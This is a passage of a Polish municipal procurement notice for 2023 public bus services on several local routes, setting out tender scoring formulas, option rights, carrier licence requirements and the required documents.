przetargu;<br/>-	Cbad - cena brutto (z VAT) podana przez oferenta dla którego wynik jest obliczany<br/>-	.<br/>Za kryterium cena oferty oferta może otrzymać maksymalnie 60 pkt. od jednego członka komisji przetargowej.<br/><br/>Liczba punktów za kryterium ,”Czas podstawienia pojazdu zastępczego’’ będzie liczona wg. następującego sposobu :<br/>Czas podstawienia autobusu zastępczego do 20 minut otrzyma 20 pkt<br/>Czas podstawienia autobusu zastępczego od 21 minut do 45 minut otrzyma 10 pkt<br/><br/><br/><br/>Za kryterium Czas podstawienia pojazdu zastępczego oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/><br/>Liczba punktów za kryterium ,”Średni wiek pojazdów” będzie liczona wg. następującego sposobu: będzie ustalona poprzez wyliczenie stosunku najniższej średniej wieku autobusów w badanych ofertach do średniego wieku autobusów w ofercie badanej i pomnożenie uzyskanego wyniku przez znaczenie procentowe kryterium, czyli wg poniższego wzoru:<br/>ŚWP= Najniższa średnia wieku autobusów w badanych ofertach/ średni wiek autobusów w ofercie badanej x 20<br/><br/>W celu ustalenia średniego wieku pojazdów Zamawiający wymaga wskazania przez wykonawcę w druku oferty 4 autobusów przewidzianych do realizacji podając rok produkcji wynikający z dowodu rejestracyjnego. Wskazane w ofercie autobusy muszą spełniać wymagane parametry techniczne .<br/>Wskazane autobusy nie mogą być wyprodukowane wcześniej niż w 2012 roku<br/>Przyjmuje się, że pojazd wyprodukowany w roku 2012 – 11 letni, w 2013 – 10 letni, w 2014 – 9 letni, w 2015 – 8 letni, w 2016 – 7 letni, w 2017 – 6 letni, w 2018 – 5 letni, w 2019 – 4 letni, w 2020 – 3 letni, w 2021 – 2 letni, w 2022 – to pojazd 1 roczny.<br/>Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5 ustawy w sytuacji, gdy Wykonawca o ofercie zaoferuje do realizacji zamówienia pojazdy wyprodukowane wcześniej niż w 2012 roku oraz w przypadku niewypełnienia przez Wykonawcę w druku oferty pola określającego rok produkcji pojazdu.<br/><br/><br/>Za kryterium Średni wiek pojazdów osoby oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/> Łączna ocena ofert:<br/> Wx = Cx + CPPZx + ŚWPx<br/><br/><br/>Gdzie:<br/>-	Wx – wskaźnik oceny oferty<br/>-	Cx – ilość punktów przyznanych ofercie w kryterium „cena ofertowa”;<br/>-	CPPZx - ilość punktów przyznanych ofercie w kryterium „ czas podstawienia pojazdu zastępczego”.<br/>-	ŚWPx – ilość punktów przyznanych ofercie w kryterium „ Średni wiek pojazdów”<br/><br/><br/>2.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/><br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/><br/>4.	Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100 pkt., od 1 członka komisji przetargowej. Po dokonaniu oceny punkty przyznane przez każdego z członków komisji przetargowej będą zsumowane dla każdego z kryteriów oddzielnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średni wiek pojazdów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III zamówienia pn. Usługi publicznego transportu zbiorowego w zakresie przewozów autobusowych o charakterze użyteczności publicznej na linii Nr 4 i Nr 5 :<br/>Nr 4:: Rudniki - Młyny - Janinów - Odcinek – Dalachów,<br/>Nr 5: Dalachów - Janinów - Młyny - Rudniki<br/>Szczegółowy opis przedmiotu zamówienia dla poszczególnych części zamówienia, jak również inne istotne elementy związane z opisem przedmiotu zamówienia podano w rozdziale nr IV SWZ.<br/>Wykonawca może złożyć ofertę w odniesieniu do jednej lub wszystkich części zamówienia.<br/>Zamawiający nie określa liczby części zamówienia , na którą wykonawca może złożyć ofertę ani maksymalnej liczby części, na które zamówienie może zostać udzielone temu samemu Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość zwiększenia lub zmniejszenia zamówienia z zastosowaniem prawa opcji ( dla wszystkich części zamówienia), o którym mowa w art. 441 ust. 1 ustawy PZP. Prawem opcji jest możliwość skorzystania ze zwiększenia lub zmniejszenia ilości wykonania dodatkowych wozokilometrów do 10 % łącznej ilości podanej w zamówieniu podstawowym. Zaistnienie okoliczności, o której mowa wyżej, spowoduje zwiększenie/zmniejszenie wynagrodzenia należnego Wykonawcy z tytułu tej umowy. Zamawiający uzależnia możliwość skorzystania z prawa opcji od wystąpienia w trakcie realizacji zamówienia potrzeby zwiększenia ilości wozokilometrów w zakresie: <br/>1)	zwiększenia ilości kursów, <br/>2)	zwiększenia ilości wozokilometrów na danej trasie, <br/>3)	możliwości przedłużenia terminu realizacji zamówienia o dodatkowe dni świadczenia usług, <br/>4)	wystąpienia innych podobnych okoliczności mogących wystąpić w trakcie realizacji zamówienia skutkujące zwiększeniem ilości wozokilometrów. <br/> Do rozliczenia zamówienia w ramach prawa opcji będzie stosowana cena za 1 wkm wynikająca z oferty wykonawcy złożonej do zamówienia podstawowego. Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>a)	Cena ofertowa – 60 % (w PLN)<br/> <br/>b)	Czas podstawienia pojazdu zastępczego – 20%<br/><br/>c)	Średni wiek pojazdów – 20%<br/><br/> gdzie 1% - 1 pkt<br/>Liczba punktów za kryterium ,,Cena oferty’’ będzie liczona wg. następującego wzoru :<br/><br/> Cx = (C min / Cbad ) x 60 pkt<br/> gdzie:<br/>-	Cx – ilość punktów przyznanej danej ofercie za cenę brutto (z VAT) ;<br/>-	Cmin – minimalna cena brutto ( z VAT ) zaoferowana w przetargu;<br/>-	Cbad - cena brutto (z VAT) podana przez oferenta dla którego wynik jest obliczany<br/>-	.<br/>Za kryterium cena oferty oferta może otrzymać maksymalnie 60 pkt. od jednego członka komisji przetargowej.<br/><br/>Liczba punktów za kryterium ,”Czas podstawienia pojazdu zastępczego’’ będzie liczona wg. następującego sposobu :<br/>Czas podstawienia autobusu zastępczego do 20 minut otrzyma 20 pkt<br/>Czas podstawienia autobusu zastępczego od 21 minut do 45 minut otrzyma 10 pkt<br/><br/><br/><br/>Za kryterium Czas podstawienia pojazdu zastępczego oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/><br/>Liczba punktów za kryterium ,”Średni wiek pojazdów” będzie liczona wg. następującego sposobu: będzie ustalona poprzez wyliczenie stosunku najniższej średniej wieku autobusów w badanych ofertach do średniego wieku autobusów w ofercie badanej i pomnożenie uzyskanego wyniku przez znaczenie procentowe kryterium, czyli wg poniższego wzoru:<br/>ŚWP= Najniższa średnia wieku autobusów w badanych ofertach/ średni wiek autobusów w ofercie badanej x 20<br/><br/>W celu ustalenia średniego wieku pojazdów Zamawiający wymaga wskazania przez wykonawcę w druku oferty 4 autobusów przewidzianych do realizacji podając rok produkcji wynikający z dowodu rejestracyjnego. Wskazane w ofercie autobusy muszą spełniać wymagane parametry techniczne .<br/>Wskazane autobusy nie mogą być wyprodukowane wcześniej niż w 2012 roku<br/>Przyjmuje się, że pojazd wyprodukowany w roku 2012 – 11 letni, w 2013 – 10 letni, w 2014 – 9 letni, w 2015 – 8 letni, w 2016 – 7 letni, w 2017 – 6 letni, w 2018 – 5 letni, w 2019 – 4 letni, w 2020 – 3 letni, w 2021 – 2 letni, w 2022 – to pojazd 1 roczny.<br/>Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5 ustawy w sytuacji, gdy Wykonawca o ofercie zaoferuje do realizacji zamówienia pojazdy wyprodukowane wcześniej niż w 2012 roku oraz w przypadku niewypełnienia przez Wykonawcę w druku oferty pola określającego rok produkcji pojazdu.<br/><br/><br/>Za kryterium Średni wiek pojazdów osoby oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/> Łączna ocena ofert:<br/> Wx = Cx + CPPZx + ŚWPx<br/><br/><br/>Gdzie:<br/>-	Wx – wskaźnik oceny oferty<br/>-	Cx – ilość punktów przyznanych ofercie w kryterium „cena ofertowa”;<br/>-	CPPZx - ilość punktów przyznanych ofercie w kryterium „ czas podstawienia pojazdu zastępczego”.<br/>-	ŚWPx – ilość punktów przyznanych ofercie w kryterium „ Średni wiek pojazdów”<br/><br/><br/>2.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/><br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/><br/>4.	Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100 pkt., od 1 członka komisji przetargowej. Po dokonaniu oceny punkty przyznane przez każdego z członków komisji przetargowej będą zsumowane dla każdego z kryteriów oddzielnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średni wiek pojazdów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV zamówienia pn. Usługi publicznego transportu zbiorowego w zakresie przewozów autobusowych o charakterze użyteczności publicznej na linii Nr 6 :Bobrowa - Cieciułów - Stawki Cieciułowskie - Żurawie - Żytniów - Rudniki <br/>Szczegółowy opis przedmiotu zamówienia dla poszczególnych części zamówienia, jak również inne istotne elementy związane z opisem przedmiotu zamówienia podano w rozdziale nr IV SWZ.<br/>Wykonawca może złożyć ofertę w odniesieniu do jednej lub wszystkich części zamówienia.<br/>Zamawiający nie określa liczby części zamówienia , na którą wykonawca może złożyć ofertę ani maksymalnej liczby części, na które zamówienie może zostać udzielone temu samemu Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 12.	Zamawiający przewiduje możliwość zwiększenia lub zmniejszenia zamówienia z zastosowaniem prawa opcji ( dla wszystkich części zamówienia), o którym mowa w art. 441 ust. 1 ustawy PZP. Prawem opcji jest możliwość skorzystania ze zwiększenia lub zmniejszenia ilości wykonania dodatkowych wozokilometrów do 10 % łącznej ilości podanej w zamówieniu podstawowym. Zaistnienie okoliczności, o której mowa wyżej, spowoduje zwiększenie/zmniejszenie wynagrodzenia należnego Wykonawcy z tytułu tej umowy. Zamawiający uzależnia możliwość skorzystania z prawa opcji od wystąpienia w trakcie realizacji zamówienia potrzeby zwiększenia ilości wozokilometrów w zakresie: <br/>1)	zwiększenia ilości kursów, <br/>2)	zwiększenia ilości wozokilometrów na danej trasie, <br/>3)	możliwości przedłużenia terminu realizacji zamówienia o dodatkowe dni świadczenia usług, <br/>4)	wystąpienia innych podobnych okoliczności mogących wystąpić w trakcie realizacji zamówienia skutkujące zwiększeniem ilości wozokilometrów. <br/> Do rozliczenia zamówienia w ramach prawa opcji będzie stosowana cena za 1 wkm wynikająca z oferty wykonawcy złożonej do zamówienia podstawowego. Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>a)	Cena ofertowa – 60 % (w PLN)<br/> <br/>b)	Czas podstawienia pojazdu zastępczego – 20%<br/><br/>c)	Średni wiek pojazdów – 20%<br/><br/> gdzie 1% - 1 pkt<br/>Liczba punktów za kryterium ,,Cena oferty’’ będzie liczona wg. następującego wzoru :<br/><br/> Cx = (C min / Cbad ) x 60 pkt<br/> gdzie:<br/>-	Cx – ilość punktów przyznanej danej ofercie za cenę brutto (z VAT) ;<br/>-	Cmin – minimalna cena brutto ( z VAT ) zaoferowana w przetargu;<br/>-	Cbad - cena brutto (z VAT) podana przez oferenta dla którego wynik jest obliczany<br/>-	.<br/>Za kryterium cena oferty oferta może otrzymać maksymalnie 60 pkt. od jednego członka komisji przetargowej.<br/><br/>Liczba punktów za kryterium ,”Czas podstawienia pojazdu zastępczego’’ będzie liczona wg. następującego sposobu :<br/>Czas podstawienia autobusu zastępczego do 20 minut otrzyma 20 pkt<br/>Czas podstawienia autobusu zastępczego od 21 minut do 45 minut otrzyma 10 pkt<br/><br/><br/><br/>Za kryterium Czas podstawienia pojazdu zastępczego oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/><br/>Liczba punktów za kryterium ,”Średni wiek pojazdów” będzie liczona wg. następującego sposobu: będzie ustalona poprzez wyliczenie stosunku najniższej średniej wieku autobusów w badanych ofertach do średniego wieku autobusów w ofercie badanej i pomnożenie uzyskanego wyniku przez znaczenie procentowe kryterium, czyli wg poniższego wzoru:<br/>ŚWP= Najniższa średnia wieku autobusów w badanych ofertach/ średni wiek autobusów w ofercie badanej x 20<br/><br/>W celu ustalenia średniego wieku pojazdów Zamawiający wymaga wskazania przez wykonawcę w druku oferty 4 autobusów przewidzianych do realizacji podając rok produkcji wynikający z dowodu rejestracyjnego. Wskazane w ofercie autobusy muszą spełniać wymagane parametry techniczne .<br/>Wskazane autobusy nie mogą być wyprodukowane wcześniej niż w 2012 roku<br/>Przyjmuje się, że pojazd wyprodukowany w roku 2012 – 11 letni, w 2013 – 10 letni, w 2014 – 9 letni, w 2015 – 8 letni, w 2016 – 7 letni, w 2017 – 6 letni, w 2018 – 5 letni, w 2019 – 4 letni, w 2020 – 3 letni, w 2021 – 2 letni, w 2022 – to pojazd 1 roczny.<br/>Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5 ustawy w sytuacji, gdy Wykonawca o ofercie zaoferuje do realizacji zamówienia pojazdy wyprodukowane wcześniej niż w 2012 roku oraz w przypadku niewypełnienia przez Wykonawcę w druku oferty pola określającego rok produkcji pojazdu.<br/><br/><br/>Za kryterium Średni wiek pojazdów osoby oferta może otrzymać maksymalnie 20 pkt. od jednego członka komisji przetargowej.<br/><br/> Łączna ocena ofert:<br/> Wx = Cx + CPPZx + ŚWPx<br/><br/><br/>Gdzie:<br/>-	Wx – wskaźnik oceny oferty<br/>-	Cx – ilość punktów przyznanych ofercie w kryterium „cena ofertowa”;<br/>-	CPPZx - ilość punktów przyznanych ofercie w kryterium „ czas podstawienia pojazdu zastępczego”.<br/>-	ŚWPx – ilość punktów przyznanych ofercie w kryterium „ Średni wiek pojazdów”<br/><br/><br/>2.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/><br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/><br/>4.	Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100 pkt., od 1 członka komisji przetargowej. Po dokonaniu oceny punkty przyznane przez każdego z członków komisji przetargowej będą zsumowane dla każdego z kryteriów oddzielnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średni wiek pojazdów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów ( dotyczy części I,II,III,IV):<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że posiadają aktualną licencję na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób, zgodnie z ustawą z dnia 06.09. 2001 roku o transporcie drogowym (t.j. Dz. U. z 2021 r. poz. 919 i 1005 ze zm.) lub dokument potwierdzający, że Wykonawca jest wpisany do rejestru działalności regulowanej, jeżeli ich potwierdzenie jest niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania<br/>W zakresie zdolności technicznej lub zawodowej :<br/>udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonali należycie co najmniej jedno zamówienie związane z przewozem osób o wartości minimum:<br/> brutto 80 000,00 zł dla części I zamówienia<br/>brutto 60 000,00 zł brutto dla części II zamówienia<br/>brutto 45 000,00 zł dla części III zamówienia<br/>brutto 35 000,00 zł dla części IV zamówienia<br/>W przypadku gdy Wykonawca składa ofertę na więcej niż jedną część zamówienia lub na wszystkie części zamówienia wtedy przedkłada dokumenty potwierdzające wykonanie jednego zamówienia związanego z przewozem osób o wartości min. 80 000,00 brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">A. na potwierdzenie braku podstaw wykluczenia:<br/>1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp sporządzone nie wcześniej niż 3 miesięcy przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument składa każdy z Wykonawców wspólnie ubiegających się o zamówienie,<br/>2)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument składa każdy z Wykonawców wspólnie ubiegających się o zamówienie – wzór stanowi załącznik nr 3 do SWZ<br/>3. Podmiotowe środki dowodowe składane przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej;<br/>1) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2.A. pkt 1), składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem. <br/>2) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 3 pkt 1, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">B. na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>1)	Aktualna licencja na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób, zgodnie z ustawą z dnia 06.09. 2001 roku o transporcie drogowym (t.j. Dz. U. z 2021 r. poz.919 i 1005 ze zm.) lub dokument potwierdzający, że Wykonawca jest wpisany do rejestru działalności regulowanej, jeżeli ich potwierdzenie jest niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. <br/>2)	Wykaz usług, wykonanych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie – Załącznik nr 8 do SWZ;<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/><br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych <br/>w rozumieniu ustawy z dnia 17 lutego 2005 r. O informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 5. 125 ust.1 Pzp dane umożliwiające dostęp do tych środków.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość <br/>i aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Formularz ofertowy, zgodnie z załącznikiem nr 1 do SWZ,<br/>b)	Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu ( zał. Nr 4 do SWZ) składane na podst. art. 125 ust. 1 ustawy Pzp i art.7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>c)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik, <br/>d)	Pełnomocnictwo (jeśli dotyczy) do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienie – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w rozdziale XII SWZ, <br/>e)	Zobowiązanie podmiotu udostępniającego zasoby zgodnie z załącznikiem nr 5 SWZ ( jeśli dotyczy)- jeżeli Wykonawca w celu potwierdzenia spełnienia warunków udziału polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby wraz z zobowiązaniem składa oświadczeniem o niepodleganiu wykluczeniu z postępowaniu tego podmiotu oraz oświadczeniem o spełnianiu warunków udziału w postępowaniu w zakresie w jakim Wykonawca powołuje się na jego zasoby, <br/>f)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki zakres rzeczowy wykonania zamówienia realizować zamierzają poszczególni Wykonawcy<br/>g)	Oświadczenie Podmiotu udostępniającego zasoby na które Wykonawca będzie się powoływał w celu spełniania warunków udziału w postępowaniu stanowiący zał. Nr 9 do SWZ., (jeżeli dotyczy),<br/>24. Oferta musi być złożona w oryginale. Wykonawca podpisuje ww. dokumenty kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym wystawionym przez dostawcę kwalifikowanej usługi 